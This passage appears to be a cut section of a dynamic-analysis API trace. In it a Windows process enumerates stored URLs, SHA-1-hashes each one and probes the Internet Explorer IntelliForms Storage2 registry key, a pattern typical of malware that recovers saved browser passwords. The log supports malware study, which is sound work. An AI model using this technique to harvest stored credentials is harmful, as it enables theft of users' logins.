lstrcatW (in: lpString1="AF44AD7DBA3D9B9DFD615BA0B4BA727B39", lpString2="AE" | out: lpString1="AF44AD7DBA3D9B9DFD615BA0B4BA727B39AE") returned="AF44AD7DBA3D9B9DFD615BA0B4BA727B39AE" [0249.376] LocalFree (hMem=0xd214ce0) returned 0x0 [0249.376] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="E0") returned 2 [0249.376] lstrlenW (lpString="AF44AD7DBA3D9B9DFD615BA0B4BA727B39AE") returned 36 [0249.376] lstrlenW (lpString="E0") returned 2 [0249.376] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5d67e60 [0249.376] lstrcpyW (in: lpString1=0x5d67e60, lpString2="AF44AD7DBA3D9B9DFD615BA0B4BA727B39AE" | out: lpString1="AF44AD7DBA3D9B9DFD615BA0B4BA727B39AE") returned="AF44AD7DBA3D9B9DFD615BA0B4BA727B39AE" [0249.376] lstrcatW (in: lpString1="AF44AD7DBA3D9B9DFD615BA0B4BA727B39AE", lpString2="E0" | out: lpString1="AF44AD7DBA3D9B9DFD615BA0B4BA727B39AEE0") returned="AF44AD7DBA3D9B9DFD615BA0B4BA727B39AEE0" [0249.376] LocalFree (hMem=0x5d67840) returned 0x0 [0249.376] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B9") returned 2 [0249.376] lstrlenW (lpString="AF44AD7DBA3D9B9DFD615BA0B4BA727B39AEE0") returned 38 [0249.376] lstrlenW (lpString="B9") returned 2 [0249.376] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x5d67300 [0249.376] lstrcpyW (in: lpString1=0x5d67300, lpString2="AF44AD7DBA3D9B9DFD615BA0B4BA727B39AEE0" | out: lpString1="AF44AD7DBA3D9B9DFD615BA0B4BA727B39AEE0") returned="AF44AD7DBA3D9B9DFD615BA0B4BA727B39AEE0" [0249.376] lstrcatW (in: lpString1="AF44AD7DBA3D9B9DFD615BA0B4BA727B39AEE0", lpString2="B9" | out: lpString1="AF44AD7DBA3D9B9DFD615BA0B4BA727B39AEE0B9") returned="AF44AD7DBA3D9B9DFD615BA0B4BA727B39AEE0B9" [0249.376] LocalFree (hMem=0x5d67e60) returned 0x0 [0249.376] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="80") returned 2 [0249.376] lstrlenW (lpString="AF44AD7DBA3D9B9DFD615BA0B4BA727B39AEE0B9") returned 40 [0249.376] lstrlenW (lpString="80") returned 2 [0249.376] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x5d67220 [0249.376] lstrcpyW (in: lpString1=0x5d67220, lpString2="AF44AD7DBA3D9B9DFD615BA0B4BA727B39AEE0B9" | out: lpString1="AF44AD7DBA3D9B9DFD615BA0B4BA727B39AEE0B9") returned="AF44AD7DBA3D9B9DFD615BA0B4BA727B39AEE0B9" [0249.376] lstrcatW (in: lpString1="AF44AD7DBA3D9B9DFD615BA0B4BA727B39AEE0B9", lpString2="80" | out: lpString1="AF44AD7DBA3D9B9DFD615BA0B4BA727B39AEE0B980") returned="AF44AD7DBA3D9B9DFD615BA0B4BA727B39AEE0B980" [0249.376] LocalFree (hMem=0x5d67300) returned 0x0 [0249.376] CryptDestroyHash (hHash=0x5d9e860) returned 1 [0249.376] CryptReleaseContext (hProv=0x5d37a10, dwFlags=0x0) returned 1 [0249.376] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c4f360 | out: phkResult=0x1c4f360*=0x0) returned 0x2 [0249.377] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f300 | out: phkResult=0x1c4f300*=0x0) returned 0x2 [0249.377] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20119, phkResult=0x1c4f2a0 | out: phkResult=0x1c4f2a0*=0x0) returned 0x2 [0249.377] LocalFree (hMem=0x5d67220) returned 0x0 [0249.377] RegEnumValueW (in: hKey=0x94c, dwIndex=0xb, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url12", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x0 [0249.377] StrStrIW (lpFirst="people.com.cn", lpSrch="?") returned 0x0 [0249.377] StrStrIW (lpFirst="people.com.cn", lpSrch="http://") returned 0x0 [0249.377] CryptAcquireContextW (in: phProv=0x1c4f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1c4f3e0*=0x5d37810) returned 1 [0249.377] CryptCreateHash (in: hProv=0x5d37810, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1c4f3d8 | out: phHash=0x1c4f3d8) returned 1 [0249.377] lstrlenW (lpString="people.com.cn") returned 13 [0249.377] CryptHashData (hHash=0x5d9e8d0, pbData=0x43ed4e0, dwDataLen=0x1c, dwFlags=0x0) returned 1 [0249.377] CryptGetHashParam (in: hHash=0x5d9e8d0, dwParam=0x2, pbData=0x1c4f410, pdwDataLen=0x1c4f4a8, dwFlags=0x0 | out: pbData=0x1c4f410, pdwDataLen=0x1c4f4a8) returned 1 [0249.377] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="FD") returned 2 [0249.377] lstrlenW (lpString="") returned 0 [0249.377] lstrlenW (lpString="FD") returned 2 [0249.377] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0xd1b32f0 [0249.377] lstrcpyW (in: lpString1=0xd1b32f0, lpString2="" | out: lpString1="") returned="" [0249.377] lstrcatW (in: lpString1="", lpString2="FD" | out: lpString1="FD") returned="FD" [0249.377] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="23") returned 2 [0249.377] lstrlenW (lpString="FD") returned 2 [0249.377] lstrlenW (lpString="23") returned 2 [0249.377] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x5d33770 [0249.377] lstrcpyW (in: lpString1=0x5d33770, lpString2="FD" | out: lpString1="FD") returned="FD" [0249.377] lstrcatW (in: lpString1="FD", lpString2="23" | out: lpString1="FD23") returned="FD23" [0249.377] LocalFree (hMem=0xd1b32f0) returned 0x0 [0249.377] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="8A") returned 2 [0249.378] lstrlenW (lpString="FD23") returned 4 [0249.378] lstrlenW (lpString="8A") returned 2 [0249.378] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x5d33950 [0249.378] lstrcpyW (in: lpString1=0x5d33950, lpString2="FD23" | out: lpString1="FD23") returned="FD23" [0249.378] lstrcatW (in: lpString1="FD23", lpString2="8A" | out: lpString1="FD238A") returned="FD238A" [0249.378] LocalFree (hMem=0x5d33770) returned 0x0 [0249.378] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="1E") returned 2 [0249.378] lstrlenW (lpString="FD238A") returned 6 [0249.378] lstrlenW (lpString="1E") returned 2 [0249.378] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x5d322d0 [0249.378] lstrcpyW (in: lpString1=0x5d322d0, lpString2="FD238A" | out: lpString1="FD238A") returned="FD238A" [0249.378] lstrcatW (in: lpString1="FD238A", lpString2="1E" | out: lpString1="FD238A1E") returned="FD238A1E" [0249.378] LocalFree (hMem=0x5d33950) returned 0x0 [0249.378] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="C1") returned 2 [0249.378] lstrlenW (lpString="FD238A1E") returned 8 [0249.378] lstrlenW (lpString="C1") returned 2 [0249.378] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x5d33770 [0249.378] lstrcpyW (in: lpString1=0x5d33770, lpString2="FD238A1E" | out: lpString1="FD238A1E") returned="FD238A1E" [0249.378] lstrcatW (in: lpString1="FD238A1E", lpString2="C1" | out: lpString1="FD238A1EC1") returned="FD238A1EC1" [0249.378] LocalFree (hMem=0x5d322d0) returned 0x0 [0249.378] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="EC") returned 2 [0249.378] lstrlenW (lpString="FD238A1EC1") returned 10 [0249.378] lstrlenW (lpString="EC") returned 2 [0249.378] LocalAlloc (uFlags=0x40, uBytes=0x9a) returned 0xd1d05a0 [0249.378] lstrcpyW (in: lpString1=0xd1d05a0, lpString2="FD238A1EC1" | out: lpString1="FD238A1EC1") returned="FD238A1EC1" [0249.378] lstrcatW (in: lpString1="FD238A1EC1", lpString2="EC" | out: lpString1="FD238A1EC1EC") returned="FD238A1EC1EC" [0249.378] LocalFree (hMem=0x5d33770) returned 0x0 [0249.378] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="C5") returned 2 [0249.378] lstrlenW (lpString="FD238A1EC1EC") returned 12 [0249.378] lstrlenW (lpString="C5") returned 2 [0249.378] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0xd1d0bd0 [0249.378] lstrcpyW (in: lpString1=0xd1d0bd0, lpString2="FD238A1EC1EC" | out: lpString1="FD238A1EC1EC") returned="FD238A1EC1EC" [0249.378] lstrcatW (in: lpString1="FD238A1EC1EC", lpString2="C5" | out: lpString1="FD238A1EC1ECC5") returned="FD238A1EC1ECC5" [0249.378] LocalFree (hMem=0xd1d05a0) returned 0x0 [0249.378] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="F4") returned 2 [0249.378] lstrlenW (lpString="FD238A1EC1ECC5") returned 14 [0249.378] lstrlenW (lpString="F4") returned 2 [0249.378] LocalAlloc (uFlags=0x40, uBytes=0xa2) returned 0xd1d05a0 [0249.378] lstrcpyW (in: lpString1=0xd1d05a0, lpString2="FD238A1EC1ECC5" | out: lpString1="FD238A1EC1ECC5") returned="FD238A1EC1ECC5" [0249.378] lstrcatW (in: lpString1="FD238A1EC1ECC5", lpString2="F4" | out: lpString1="FD238A1EC1ECC5F4") returned="FD238A1EC1ECC5F4" [0249.379] LocalFree (hMem=0xd1d0bd0) returned 0x0 [0249.379] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="20") returned 2 [0249.379] lstrlenW (lpString="FD238A1EC1ECC5F4") returned 16 [0249.379] lstrlenW (lpString="20") returned 2 [0249.379] LocalAlloc (uFlags=0x40, uBytes=0xa6) returned 0xd1d0910 [0249.379] lstrcpyW (in: lpString1=0xd1d0910, lpString2="FD238A1EC1ECC5F4" | out: lpString1="FD238A1EC1ECC5F4") returned="FD238A1EC1ECC5F4" [0249.379] lstrcatW (in: lpString1="FD238A1EC1ECC5F4", lpString2="20" | out: lpString1="FD238A1EC1ECC5F420") returned="FD238A1EC1ECC5F420" [0249.379] LocalFree (hMem=0xd1d05a0) returned 0x0 [0249.379] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="5D") returned 2 [0249.379] lstrlenW (lpString="FD238A1EC1ECC5F420") returned 18 [0249.379] lstrlenW (lpString="5D") returned 2 [0249.379] LocalAlloc (uFlags=0x40, uBytes=0xaa) returned 0xd216af0 [0249.379] lstrcpyW (in: lpString1=0xd216af0, lpString2="FD238A1EC1ECC5F420" | out: lpString1="FD238A1EC1ECC5F420") returned="FD238A1EC1ECC5F420" [0249.379] lstrcatW (in: lpString1="FD238A1EC1ECC5F420", lpString2="5D" | out: lpString1="FD238A1EC1ECC5F4205D") returned="FD238A1EC1ECC5F4205D" [0249.379] LocalFree (hMem=0xd1d0910) returned 0x0 [0249.379] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="22") returned 2 [0249.379] lstrlenW (lpString="FD238A1EC1ECC5F4205D") returned 20 [0249.379] lstrlenW (lpString="22") returned 2 [0249.379] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0xd2177b0 [0249.379] lstrcpyW (in: lpString1=0xd2177b0, lpString2="FD238A1EC1ECC5F4205D" | out: lpString1="FD238A1EC1ECC5F4205D") returned="FD238A1EC1ECC5F4205D" [0249.379] lstrcatW (in: lpString1="FD238A1EC1ECC5F4205D", lpString2="22" | out: lpString1="FD238A1EC1ECC5F4205D22") returned="FD238A1EC1ECC5F4205D22" [0249.379] LocalFree (hMem=0xd216af0) returned 0x0 [0249.379] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="6C") returned 2 [0249.379] lstrlenW (lpString="FD238A1EC1ECC5F4205D22") returned 22 [0249.379] lstrlenW (lpString="6C") returned 2 [0249.379] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0xd216c70 [0249.379] lstrcpyW (in: lpString1=0xd216c70, lpString2="FD238A1EC1ECC5F4205D22" | out: lpString1="FD238A1EC1ECC5F4205D22") returned="FD238A1EC1ECC5F4205D22" [0249.379] lstrcatW (in: lpString1="FD238A1EC1ECC5F4205D22", lpString2="6C" | out: lpString1="FD238A1EC1ECC5F4205D226C") returned="FD238A1EC1ECC5F4205D226C" [0249.379] LocalFree (hMem=0xd2177b0) returned 0x0 [0249.379] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="5B") returned 2 [0249.379] lstrlenW (lpString="FD238A1EC1ECC5F4205D226C") returned 24 [0249.379] lstrlenW (lpString="5B") returned 2 [0249.379] LocalAlloc (uFlags=0x40, uBytes=0xb6) returned 0xd217570 [0249.379] lstrcpyW (in: lpString1=0xd217570, lpString2="FD238A1EC1ECC5F4205D226C" | out: lpString1="FD238A1EC1ECC5F4205D226C") returned="FD238A1EC1ECC5F4205D226C" [0249.379] lstrcatW (in: lpString1="FD238A1EC1ECC5F4205D226C", lpString2="5B" | out: lpString1="FD238A1EC1ECC5F4205D226C5B") returned="FD238A1EC1ECC5F4205D226C5B" [0249.379] LocalFree (hMem=0xd216c70) returned 0x0 [0249.379] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="39") returned 2 [0249.379] lstrlenW (lpString="FD238A1EC1ECC5F4205D226C5B") returned 26 [0249.379] lstrlenW (lpString="39") returned 2 [0249.379] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0xd2151c0 [0249.379] lstrcpyW (in: lpString1=0xd2151c0, lpString2="FD238A1EC1ECC5F4205D226C5B" | out: lpString1="FD238A1EC1ECC5F4205D226C5B") returned="FD238A1EC1ECC5F4205D226C5B" [0249.380] lstrcatW (in: lpString1="FD238A1EC1ECC5F4205D226C5B", lpString2="39" | out: lpString1="FD238A1EC1ECC5F4205D226C5B39") returned="FD238A1EC1ECC5F4205D226C5B39" [0249.380] LocalFree (hMem=0xd217570) returned 0x0 [0249.380] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="C4") returned 2 [0249.380] lstrlenW (lpString="FD238A1EC1ECC5F4205D226C5B39") returned 28 [0249.380] lstrlenW (lpString="C4") returned 2 [0249.380] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0xd214ce0 [0249.380] lstrcpyW (in: lpString1=0xd214ce0, lpString2="FD238A1EC1ECC5F4205D226C5B39" | out: lpString1="FD238A1EC1ECC5F4205D226C5B39") returned="FD238A1EC1ECC5F4205D226C5B39" [0249.380] lstrcatW (in: lpString1="FD238A1EC1ECC5F4205D226C5B39", lpString2="C4" | out: lpString1="FD238A1EC1ECC5F4205D226C5B39C4") returned="FD238A1EC1ECC5F4205D226C5B39C4" [0249.380] LocalFree (hMem=0xd2151c0) returned 0x0 [0249.380] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="A4") returned 2 [0249.380] lstrlenW (lpString="FD238A1EC1ECC5F4205D226C5B39C4") returned 30 [0249.380] lstrlenW (lpString="A4") returned 2 [0249.380] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0xd214800 [0249.380] lstrcpyW (in: lpString1=0xd214800, lpString2="FD238A1EC1ECC5F4205D226C5B39C4" | out: lpString1="FD238A1EC1ECC5F4205D226C5B39C4") returned="FD238A1EC1ECC5F4205D226C5B39C4" [0249.380] lstrcatW (in: lpString1="FD238A1EC1ECC5F4205D226C5B39C4", lpString2="A4" | out: lpString1="FD238A1EC1ECC5F4205D226C5B39C4A4") returned="FD238A1EC1ECC5F4205D226C5B39C4A4" [0249.380] LocalFree (hMem=0xd214ce0) returned 0x0 [0249.380] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="99") returned 2 [0249.380] lstrlenW (lpString="FD238A1EC1ECC5F4205D226C5B39C4A4") returned 32 [0249.380] lstrlenW (lpString="99") returned 2 [0249.380] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0xd214660 [0249.380] lstrcpyW (in: lpString1=0xd214660, lpString2="FD238A1EC1ECC5F4205D226C5B39C4A4" | out: lpString1="FD238A1EC1ECC5F4205D226C5B39C4A4") returned="FD238A1EC1ECC5F4205D226C5B39C4A4" [0249.380] lstrcatW (in: lpString1="FD238A1EC1ECC5F4205D226C5B39C4A4", lpString2="99" | out: lpString1="FD238A1EC1ECC5F4205D226C5B39C4A499") returned="FD238A1EC1ECC5F4205D226C5B39C4A499" [0249.380] LocalFree (hMem=0xd214800) returned 0x0 [0249.380] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="C4") returned 2 [0249.380] lstrlenW (lpString="FD238A1EC1ECC5F4205D226C5B39C4A499") returned 34 [0249.380] lstrlenW (lpString="C4") returned 2 [0249.380] LocalAlloc (uFlags=0x40, uBytes=0xca) returned 0x5d67840 [0249.380] lstrcpyW (in: lpString1=0x5d67840, lpString2="FD238A1EC1ECC5F4205D226C5B39C4A499" | out: lpString1="FD238A1EC1ECC5F4205D226C5B39C4A499") returned="FD238A1EC1ECC5F4205D226C5B39C4A499" [0249.380] lstrcatW (in: lpString1="FD238A1EC1ECC5F4205D226C5B39C4A499", lpString2="C4" | out: lpString1="FD238A1EC1ECC5F4205D226C5B39C4A499C4") returned="FD238A1EC1ECC5F4205D226C5B39C4A499C4" [0249.380] LocalFree (hMem=0xd214660) returned 0x0 [0249.380] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="2E") returned 2 [0249.380] lstrlenW (lpString="FD238A1EC1ECC5F4205D226C5B39C4A499C4") returned 36 [0249.380] lstrlenW (lpString="2E") returned 2 [0249.380] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5d67e60 [0249.380] lstrcpyW (in: lpString1=0x5d67e60, lpString2="FD238A1EC1ECC5F4205D226C5B39C4A499C4" | out: lpString1="FD238A1EC1ECC5F4205D226C5B39C4A499C4") returned="FD238A1EC1ECC5F4205D226C5B39C4A499C4" [0249.380] lstrcatW (in: lpString1="FD238A1EC1ECC5F4205D226C5B39C4A499C4", lpString2="2E" | out: lpString1="FD238A1EC1ECC5F4205D226C5B39C4A499C42E") returned="FD238A1EC1ECC5F4205D226C5B39C4A499C42E" [0249.380] LocalFree (hMem=0x5d67840) returned 0x0 [0249.380] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="EE") returned 2 [0249.380] lstrlenW (lpString="FD238A1EC1ECC5F4205D226C5B39C4A499C42E") returned 38 [0249.380] lstrlenW (lpString="EE") returned 2 [0249.380] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x5d67220 [0249.380] lstrcpyW (in: lpString1=0x5d67220, lpString2="FD238A1EC1ECC5F4205D226C5B39C4A499C42E" | out: lpString1="FD238A1EC1ECC5F4205D226C5B39C4A499C42E") returned="FD238A1EC1ECC5F4205D226C5B39C4A499C42E" [0249.380] lstrcatW (in: lpString1="FD238A1EC1ECC5F4205D226C5B39C4A499C42E", lpString2="EE" | out: lpString1="FD238A1EC1ECC5F4205D226C5B39C4A499C42EEE") returned="FD238A1EC1ECC5F4205D226C5B39C4A499C42EEE" [0249.381] LocalFree (hMem=0x5d67e60) returned 0x0 [0249.381] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="AE") returned 2 [0249.381] lstrlenW (lpString="FD238A1EC1ECC5F4205D226C5B39C4A499C42EEE") returned 40 [0249.381] lstrlenW (lpString="AE") returned 2 [0249.381] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x5d67840 [0249.381] lstrcpyW (in: lpString1=0x5d67840, lpString2="FD238A1EC1ECC5F4205D226C5B39C4A499C42EEE" | out: lpString1="FD238A1EC1ECC5F4205D226C5B39C4A499C42EEE") returned="FD238A1EC1ECC5F4205D226C5B39C4A499C42EEE" [0249.381] lstrcatW (in: lpString1="FD238A1EC1ECC5F4205D226C5B39C4A499C42EEE", lpString2="AE" | out: lpString1="FD238A1EC1ECC5F4205D226C5B39C4A499C42EEEAE") returned="FD238A1EC1ECC5F4205D226C5B39C4A499C42EEEAE" [0249.381] LocalFree (hMem=0x5d67220) returned 0x0 [0249.381] CryptDestroyHash (hHash=0x5d9e8d0) returned 1 [0249.381] CryptReleaseContext (hProv=0x5d37810, dwFlags=0x0) returned 1 [0249.381] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c4f360 | out: phkResult=0x1c4f360*=0x0) returned 0x2 [0249.381] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f300 | out: phkResult=0x1c4f300*=0x0) returned 0x2 [0249.381] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20119, phkResult=0x1c4f2a0 | out: phkResult=0x1c4f2a0*=0x0) returned 0x2 [0249.381] LocalFree (hMem=0x5d67840) returned 0x0 [0249.381] RegEnumValueW (in: hKey=0x94c, dwIndex=0xc, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url11", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x0 [0249.381] StrStrIW (lpFirst="tmall.com", lpSrch="?") returned 0x0 [0249.381] StrStrIW (lpFirst="tmall.com", lpSrch="http://") returned 0x0 [0249.381] CryptAcquireContextW (in: phProv=0x1c4f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1c4f3e0*=0x5d39d10) returned 1 [0249.381] CryptCreateHash (in: hProv=0x5d39d10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1c4f3d8 | out: phHash=0x1c4f3d8) returned 1 [0249.381] lstrlenW (lpString="tmall.com") returned 9 [0249.381] CryptHashData (hHash=0x5d9eda0, pbData=0x43ed4e0, dwDataLen=0x14, dwFlags=0x0) returned 1 [0249.381] CryptGetHashParam (in: hHash=0x5d9eda0, dwParam=0x2, pbData=0x1c4f410, pdwDataLen=0x1c4f4a8, dwFlags=0x0 | out: pbData=0x1c4f410, pdwDataLen=0x1c4f4a8) returned 1 [0249.381] CryptDestroyHash (hHash=0x5d9eda0) returned 1 [0249.381] CryptReleaseContext (hProv=0x5d39d10, dwFlags=0x0) returned 1 [0249.381] RegEnumValueW (in: hKey=0x94c, dwIndex=0xd, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url10", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x0 [0249.381] StrStrIW (lpFirst="gmx.net", lpSrch="?") returned 0x0 [0249.382] StrStrIW (lpFirst="gmx.net", lpSrch="http://") returned 0x0 [0249.382] CryptAcquireContextW (in: phProv=0x1c4f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1c4f3e0*=0x5d3ab10) returned 1 [0249.382] CryptCreateHash (in: hProv=0x5d3ab10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1c4f3d8 | out: phHash=0x1c4f3d8) returned 1 [0249.382] lstrlenW (lpString="gmx.net") returned 7 [0249.382] CryptHashData (hHash=0x5d9dfa0, pbData=0x43ed4e0, dwDataLen=0x10, dwFlags=0x0) returned 1 [0249.382] CryptGetHashParam (in: hHash=0x5d9dfa0, dwParam=0x2, pbData=0x1c4f410, pdwDataLen=0x1c4f4a8, dwFlags=0x0 | out: pbData=0x1c4f410, pdwDataLen=0x1c4f4a8) returned 1 [0249.382] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="4B") returned 2 [0249.382] lstrlenW (lpString="") returned 0 [0249.382] lstrlenW (lpString="4B") returned 2 [0249.382] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0xd1b4190 [0249.382] lstrcpyW (in: lpString1=0xd1b4190, lpString2="" | out: lpString1="") returned="" [0249.382] lstrcatW (in: lpString1="", lpString2="4B" | out: lpString1="4B") returned="4B" [0249.382] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="D7") returned 2 [0249.382] lstrlenW (lpString="4B") returned 2 [0249.382] lstrlenW (lpString="D7") returned 2 [0249.382] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x5d33770 [0249.382] lstrcpyW (in: lpString1=0x5d33770, lpString2="4B" | out: lpString1="4B") returned="4B" [0249.382] lstrcatW (in: lpString1="4B", lpString2="D7" | out: lpString1="4BD7") returned="4BD7" [0249.382] LocalFree (hMem=0xd1b4190) returned 0x0 [0249.382] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="47") returned 2 [0249.382] lstrlenW (lpString="4BD7") returned 4 [0249.382] lstrlenW (lpString="47") returned 2 [0249.382] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x5d33950 [0249.382] lstrcpyW (in: lpString1=0x5d33950, lpString2="4BD7" | out: lpString1="4BD7") returned="4BD7" [0249.382] lstrcatW (in: lpString1="4BD7", lpString2="47" | out: lpString1="4BD747") returned="4BD747" [0249.382] LocalFree (hMem=0x5d33770) returned 0x0 [0249.382] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="F5") returned 2 [0249.382] lstrlenW (lpString="4BD747") returned 6 [0249.383] lstrlenW (lpString="F5") returned 2 [0249.383] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x5d33770 [0249.383] lstrcpyW (in: lpString1=0x5d33770, lpString2="4BD747" | out: lpString1="4BD747") returned="4BD747" [0249.383] lstrcatW (in: lpString1="4BD747", lpString2="F5" | out: lpString1="4BD747F5") returned="4BD747F5" [0249.383] LocalFree (hMem=0x5d33950) returned 0x0 [0249.383] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="57") returned 2 [0249.383] lstrlenW (lpString="4BD747F5") returned 8 [0249.383] lstrlenW (lpString="57") returned 2 [0249.383] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x5d33950 [0249.383] lstrcpyW (in: lpString1=0x5d33950, lpString2="4BD747F5" | out: lpString1="4BD747F5") returned="4BD747F5" [0249.383] lstrcatW (in: lpString1="4BD747F5", lpString2="57" | out: lpString1="4BD747F557") returned="4BD747F557" [0249.383] LocalFree (hMem=0x5d33770) returned 0x0 [0249.383] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | 